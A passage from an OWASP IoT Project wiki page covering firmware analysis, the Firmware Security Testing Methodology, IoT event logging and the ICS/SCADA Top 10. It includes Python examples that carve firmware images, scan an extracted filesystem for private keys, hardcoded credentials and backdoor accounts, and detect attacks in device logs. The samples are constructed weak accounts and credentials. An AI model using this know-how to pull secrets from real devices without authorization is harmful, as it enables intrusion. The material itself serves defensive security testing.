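    hdr = hdr[:4] + struct.pack(">I", crc32(hdr)) + hdr[8:]   # fill in ih_hcrc
    rootfs_body = b"root:x:0:0:root:/root:/bin/sh\n" + b"\0" * 200
    superblock = b"hsqs" + struct.pack("<IIIIHHHHHHQQ", 12, 0x5F000000, 131072, 0, 1, 17,
                                       0xC0, 1, 4, 0, 0, 96 + len(rootfs_body)) + b"\xff" * 48
    return b"\0" * 16 + hdr + kernel + b"\xff" * 64 + superblock + rootfs_body + b"\xff" * 32


if __name__ == "__main__":
    report = triage(build_sample_image())
    for h in report["uimage"]:
        print(f"uImage @0x{h['offset']:x}: {h['name']} size={h['size']} arch={h['arch']} "
              f"data_crc_ok={h['data_crc_ok']}")
    for off, desc in report["signatures"]:
        print(f"0x{off:06x}  {desc}")
    for off, img in report["squashfs"]:
        print(f"carved squashfs @0x{off:x}: {len(img)} bytes")
```
<br />
To run it against a real image, replace build_sample_image() with the bytes of the downloaded or dumped file. A uImage header whose CRC does not verify is either corrupt or not a header at that offset, and the squashfs bytes_used length gives the exact slice to hand to unsquashfs.<br />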
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file system for sensitive or interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Firmware Security Testing Methodology =<br />
[[File:OWASP_Project_Header.jpg|link=]]<br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Security Testing Methodology ==<br />
<br />
The Firmware Security Testing Methodology (FSTM) is composed of nine stages that enable security researchers, software developers, consultants, hobbyists, and information security professionals to conduct firmware security assessments.<br />
<br />
{| class="wikitable"<br />
|'''Stage'''<br />
|'''Description'''<br />
|-<br />
|1. Information gathering and reconnaissance<br />
|Acquire all relevant technical and documentation details pertaining to the target device’s firmware<br />
|-<br />
|2. Obtaining firmware<br />
|Obtain the firmware using one or more of the methods listed in the full methodology<br />
|-<br />
|3. Analyzing firmware<br />
|Examine the target firmware’s characteristics<br />
|-<br />
|4. Extracting the filesystem<br />
|Carve filesystem contents from the target firmware<br />
|-<br />
|5. Analyzing filesystem contents<br />
|Statically analyze extracted filesystem configuration files and binaries for vulnerabilities <br />
|-<br />
|6. Emulating firmware<br />
|Emulate firmware files and components<br />
|-<br />
|7. Dynamic analysis<br />
|Perform dynamic security testing against firmware and application interfaces<br />
|-<br />
|8. Runtime analysis<br />
|Analyze compiled binaries during device runtime<br />
|-<br />
|9. Binary Exploitation<br />
|Exploit identified vulnerabilities discovered in previous stages to attain root and/or code execution<br />
|}The full methodology release can be downloaded via the following TBD. <br />
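Stage 5 (analyzing filesystem contents), as an added example that is not part of the methodology or its companion VM: a stdlib-only Python sweep of an extracted root filesystem for the weakness classes listed in the Firmware Analysis tab, namely backdoor uid-0 accounts, empty passwords and weak hash formats in etc/passwd and etc/shadow, credentials in configuration files, private keys, certificates shared with other firmware images, setuid binaries and hardcoded URLs. The sample root filesystem, its credential and hash values and the "other image" certificate fingerprint are all constructed for the example.<br />
<br />
```python
"""Static sweep of an extracted root filesystem (FSTM stage 5) for
hardcoded/default credentials, backdoor accounts, weak password hashes,
exposed private keys, certificates reused across images, setuid binaries
and hardcoded URLs. Added example for this page, not OWASP project code;
it is a stdlib-only take on what firmwalker does with grep. The root
filesystem is constructed in a temporary directory so the script runs offline.
"""
import base64
import hashlib
import os
import re
import stat
import tempfile

PRIVATE_KEY_RE = re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----")
CERT_RE = re.compile(r"-----BEGIN CERTIFICATE-----(.*?)-----END CERTIFICATE-----", re.S)
CRED_RE = re.compile(r"(?i)\b(passw(?:or)?d|secret|api[_-]?key|token)\s*[=:]\s*['\"]?([^\s'\"]+)")
URL_RE = re.compile(r"https?://[^\s'\"<>]+")


def read_bytes(path):
    try:
        with open(path, "rb") as fh:
            return fh.read()
    except OSError:
        return b""


def check_accounts(root):
    """uid-0 aliases and empty passwords in etc/passwd; empty or weak hashes in etc/shadow."""
    out = []
    for line in read_bytes(os.path.join(root, "etc/passwd")).decode("utf-8", "replace").splitlines():
        f = line.split(":")
        if len(f) >= 7:
            if f[2] == "0" and f[0] != "root":
                out.append(("backdoor account", f"etc/passwd: {f[0]} has uid 0"))
            if f[1] == "":
                out.append(("account without password", f"etc/passwd: {f[0]}"))
    for line in read_bytes(os.path.join(root, "etc/shadow")).decode("utf-8", "replace").splitlines():
        f = line.split(":")
        if len(f) >= 2 and f[1] == "":
            out.append(("empty password", f"etc/shadow: {f[0]}"))
        elif len(f) >= 2 and f[1].startswith("$1$"):
            out.append(("weak password hash", f"etc/shadow: {f[0]} uses md5-crypt"))
    return out


def scan_rootfs(root, known_cert_fingerprints=None):
    """Return (check, detail) findings. known_cert_fingerprints maps SHA-256 of
    certificates seen in other images to that image's name, so a certificate
    shared across devices or product lines is flagged."""
    findings = check_accounts(root)
    known = dict(known_cert_fingerprints or {})
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue
            if st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                findings.append(("setuid/setgid binary", rel))
            raw = read_bytes(path)
            if b"\0" in raw[:1024]:
                continue                      # binary file: only the mode check applies
            text = raw.decode("utf-8", "replace")
            if PRIVATE_KEY_RE.search(text):
                findings.append(("private key on filesystem", rel))
            for m in CERT_RE.finditer(text):
                fp = hashlib.sha256(base64.b64decode("".join(m.group(1).split()))).hexdigest()
                if fp in known and known[fp] != rel:
                    findings.append(("certificate shared with another image", f"{rel} (also in {known[fp]})"))
                known.setdefault(fp, rel)
            if rel not in ("etc/passwd", "etc/shadow"):
                for m in CRED_RE.finditer(text):
                    findings.append(("hardcoded credential", f"{rel}: {m.group(1)}={m.group(2)}"))
            for url in URL_RE.findall(text):
                findings.append(("hardcoded URL", f"{rel}: {url}"))
    return findings


def build_sample_rootfs(root):
    """Constructed rootfs that exhibits each weakness; every value is made up."""
    cert_b64 = base64.b64encode(b"constructed-fake-der-certificate").decode()
    files = {
        "etc/passwd": "root:x:0:0:root:/root:/bin/sh\nadmin:x:0:0::/:/bin/sh\nguest::1000:1000::/:/bin/sh\n",
        "etc/shadow": "root:$1$saltsalt$fakemd5crypthashvalue:0:0:99999:7:::\nadmin::0:0:99999:7:::\n",
        "etc/config/wireless": "option ssid 'IoT-AP'\npassword=admin123\n",
        "etc/ssl/device.key": "-----BEGIN RSA PRIVATE KEY-----\nMIIBfake==\n-----END RSA PRIVATE KEY-----\n",
        "etc/ssl/device.crt": f"-----BEGIN CERTIFICATE-----\n{cert_b64}\n-----END CERTIFICATE-----\n",
        "www/cgi-bin/update.sh": "#!/bin/sh\nwget http://fw.vendor.example/latest.bin -O /tmp/fw.bin\n",
    }
    for rel, content in files.items():
        os.makedirs(os.path.dirname(os.path.join(root, rel)), exist_ok=True)
        with open(os.path.join(root, rel), "w") as fh:
            fh.write(content)
    busybox = os.path.join(root, "bin/busybox")
    os.makedirs(os.path.dirname(busybox), exist_ok=True)
    with open(busybox, "wb") as fh:
        fh.write(b"\x7fELF\0\0\0constructed")
    os.chmod(busybox, 0o4755)             # setuid, as many vendor images ship it


def demo():
    """Build and scan the sample rootfs, pretending another image shipped the same cert."""
    seen = {hashlib.sha256(b"constructed-fake-der-certificate").hexdigest(): "other-product-v1.2.bin"}
    with tempfile.TemporaryDirectory() as root:
        build_sample_rootfs(root)
        return scan_rootfs(root, seen)


if __name__ == "__main__":
    for check, detail in demo():
        print(f"[{check}] {detail}")
```
<br />
Point scan_rootfs() at the directory binwalk or unsquashfs produced, and feed it the certificate fingerprints collected from the vendor's other images: a match is the "same certificate used on multiple devices" weakness, and the private key next to it usually means every unit shares it.<br />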
<br />
{{Social Media Links}} <br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Security Testing Methodology ==<br />
<br />
The Firmware Security Testing Methodology Project provides:<br />
<br />
*Attack walkthroughs<br />
*Tool usage examples<br />
*Screenshots<br />
*Companion virtual machine preloaded with tools (EmbedOS) - <nowiki>https://github.com/scriptingxss/EmbedOS</nowiki> <br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
<br />
== Quick Download ==<br />
* TBD<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum set of events an IoT device should log. It covers many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
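Detection logic for several of the events above, as an added example that is not OWASP project code: a small AppSensor-style detector that consumes device log records and raises the named events. The record fields (ts, device, src, type, user, ok, credential, session, method, sensor), the thresholds and the sample records are constructed for this example; the credential = "factory-default" flag assumes the device itself reports whether the accepted password is still the factory default, since a log must never carry the password itself.<br />
<br />
```python
"""AppSensor-style detector that turns device/gateway log records into the
IoT logging events named in the table. Added example for this page, not
OWASP project code. The record schema, thresholds and sample records are
constructed; a real deployment needs an adapter from the device's own log
format onto these fields.
"""
from collections import Counter, defaultdict, deque

ALLOWED_METHODS = {"GET", "POST", "PUT", "DELETE"}
FAILED_PASSWORD_THRESHOLD = 3                # consecutive failures per (device, user)
LOGIN_RATE_WINDOW_S, LOGIN_RATE_MAX = 10, 5  # 5 attempts within 10 s from one source

TAMPER_EVENTS = {"case": "Device Case Tampering Detected",
                 "board": "Device Logic Board Tampering Detected"}


class IoTEventDetector:
    def __init__(self, enrolled_devices):
        self.enrolled = set(enrolled_devices)    # ecosystem membership list
        self.failures = defaultdict(int)         # (device, user) -> consecutive failures
        self.attempts = defaultdict(deque)       # (device, src) -> login timestamps
        self.session_src = {}                    # session id -> source that opened it

    @staticmethod
    def _event(name, rec, **extra):
        return {"event": name, "ts": rec["ts"], "device": rec["device"],
                "src": rec["src"], **extra}

    def ingest(self, rec):
        """Return the events raised by one log record (usually none)."""
        events = []
        dev, src, ts = rec["device"], rec["src"], rec["ts"]
        if dev not in self.enrolled:
            events.append(self._event("Traffic Seen from Unenrolled System", rec))
        kind = rec["type"]
        if kind == "http":
            if rec["method"] not in ALLOWED_METHODS:
                events.append(self._event("Attempt to Invoke Unsupported HTTP Method",
                                          rec, method=rec["method"]))
            sid = rec.get("session")
            if sid is not None and self.session_src.setdefault(sid, src) != src:
                events.append(self._event("Source Location Changes During Session", rec,
                                          session=sid, first_src=self.session_src[sid]))
        elif kind == "login":
            window = self.attempts[(dev, src)]
            window.append(ts)
            while ts - window[0] > LOGIN_RATE_WINDOW_S:   # drop attempts outside the window
                window.popleft()
            if len(window) >= LOGIN_RATE_MAX:
                events.append(self._event("High Rate of Login Attempts", rec,
                                          attempts=len(window)))
            key = (dev, rec["user"])
            if rec["ok"]:
                self.failures[key] = 0
                if rec.get("credential") == "factory-default":
                    events.append(self._event(
                        "Device Accessed Using Default Administrative Credentials",
                        rec, user=rec["user"]))
            else:
                self.failures[key] += 1
                if self.failures[key] == FAILED_PASSWORD_THRESHOLD:
                    events.append(self._event("Multiple Failed Passwords", rec,
                                              user=rec["user"]))
        elif kind == "admin_mode":
            events.append(self._event("Device Entered Administrative Mode", rec,
                                      user=rec.get("user")))
        elif kind == "tamper":
            events.append(self._event(TAMPER_EVENTS[rec["sensor"]], rec))
        return events


def detect(records, enrolled=("cam-01",)):
    """Run all records through one detector in timestamp order."""
    det = IoTEventDetector(enrolled)
    return [ev for rec in sorted(records, key=lambda r: r["ts"]) for ev in det.ingest(rec)]


def event_counts(events):
    return Counter(ev["event"] for ev in events)


# Constructed sample log: a default-credential brute force against a camera,
# then admin-mode use, an odd HTTP verb, a session reused from another
# address, an unknown device talking, and a case-open sensor firing.
SAMPLE_RECORDS = [
    {"ts": 100, "device": "cam-01", "src": "10.0.0.5", "type": "login", "user": "admin", "ok": False},
    {"ts": 101, "device": "cam-01", "src": "10.0.0.5", "type": "login", "user": "admin", "ok": False},
    {"ts": 102, "device": "cam-01", "src": "10.0.0.5", "type": "login", "user": "admin", "ok": False},
    {"ts": 103, "device": "cam-01", "src": "10.0.0.5", "type": "login", "user": "admin", "ok": False},
    {"ts": 104, "device": "cam-01", "src": "10.0.0.5", "type": "login", "user": "admin", "ok": True,
     "credential": "factory-default"},
    {"ts": 105, "device": "cam-01", "src": "10.0.0.5", "type": "admin_mode", "user": "admin"},
    {"ts": 106, "device": "cam-01", "src": "10.0.0.5", "type": "http", "method": "TRACE",
     "path": "/", "session": "s1"},
    {"ts": 107, "device": "cam-01", "src": "198.51.100.7", "type": "http", "method": "GET",
     "path": "/config", "session": "s1"},
    {"ts": 108, "device": "unknown-99", "src": "10.0.0.9", "type": "http", "method": "GET", "path": "/"},
    {"ts": 109, "device": "cam-01", "src": "local", "type": "tamper", "sensor": "case"},
]

if __name__ == "__main__":
    for ev in detect(SAMPLE_RECORDS):
        print(f"{ev['ts']:>4}  {ev['device']:<10} {ev['src']:<14} {ev['event']}")
```
<br />
The thresholds are deliberately low so the sample triggers; in production they are tuned per device class, and the events are shipped off the device (syslog, MQTT, the cloud API) rather than kept in a local ring buffer an attacker with a shell can clear.<br />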
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Security Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general do not log nearly enough events to feed a solid detection and response program, and companies that want to build one have few good resources describing what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
=ICS/SCADA=<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
==ICS/SCADA Project==<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
{| class="wikitable" border="1" style="text-align: left"<br />
!Rank and ID<br />
!Title<br />
|-<br />
|'''1 - CWE-119'''<br />
|<br />
*Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|-<br />
|'''2 - CWE-20'''<br />
|<br />
*Improper Input Validation<br />
|-<br />
|'''3 - CWE-22'''<br />
|<br />
*Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
|'''4 - CWE-264'''<br />
|<br />
*Permissions, Privileges, and Access Controls<br />
|-<br />
|'''5 - CWE-200'''<br />
|<br />
*Information Exposure<br />
|-<br />
|'''6 - CWE-255'''<br />
|<br />
*Credentials Management<br />
|-<br />
|'''7 - CWE-287'''<br />
|<br />
*Improper Authentication<br />
|-<br />
|'''8 - CWE-399'''<br />
|<br />
*Resource Management Errors<br />
|-<br />
|'''9 - CWE-79'''<br />
|<br />
*Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|-<br />
|'''10 - CWE-189'''<br />
|<br />
*Numeric Errors<br />
|-<br />
|}{{Social Media Links}}<br />
| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |<br />
==What is the ICS/SCADA Project?==<br />
The ICS/SCADA Project provides:<br />
*A list of the Top 10 most dangerous software weaknesses<br />
==Project Leaders==<br />
*NJ Ouchn<br />
==Related Projects==<br />
*[[OWASP Mobile Security Project|OWASP Mobile Security]]<br />
*[[OWASP Top Ten Project|OWASP Web Top 10]]<br />
==Collaboration==<br />
[https://owasp-iot-security.slack.com/ The Slack Channel]<br />
==Quick Download==<br />
*Coming Soon<br />
==News and Events==<br />
*Coming Soon<br />
|}<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;"></div><br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501(c)(3) charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is a global organization supported by over 100 organizations, headquartered in Bellevue, Washington with offices in Washington, DC.<br />
<br />
Addressing these mounting concerns, in January 2015 the Online Trust Alliance established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes that “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security and sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long-term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
RSA Conference San Francisco <br> <br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br><br />
Daniel Miessler, Practice Principal <br><br />
April 21, 2015 <br><br />
--- <br><br />
Defcon 23 <br><br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br><br />
Daniel Miessler <br><br />
August 6-9, 2015<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=255831OWASP Internet of Things Project2019-10-31T14:38:04Z<p>Aaron.guzman: /* Medical Device Testing */</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides, Tools, and Top Vulnerabilities.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has been released![[File:OWASP 2018 IoT Top10 Final.jpg|center|thumb|1301x1301px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way to help Developers, Manufacturers, Enterprises, and Consumers make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf 2018 OWASP IoT Top 10].<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including: manufacturers, consulting, security testers, developers, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security,] and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT—including embedded security, ICS/ SCADA,etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants — whether you’re a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the #iot-security room of the OWASP Slack Channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the [http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, adapt it, and use it commercially, provided that you attribute the work and, if you alter, transform, or build upon it, distribute the resulting work only under the same or a similar license.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
* IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
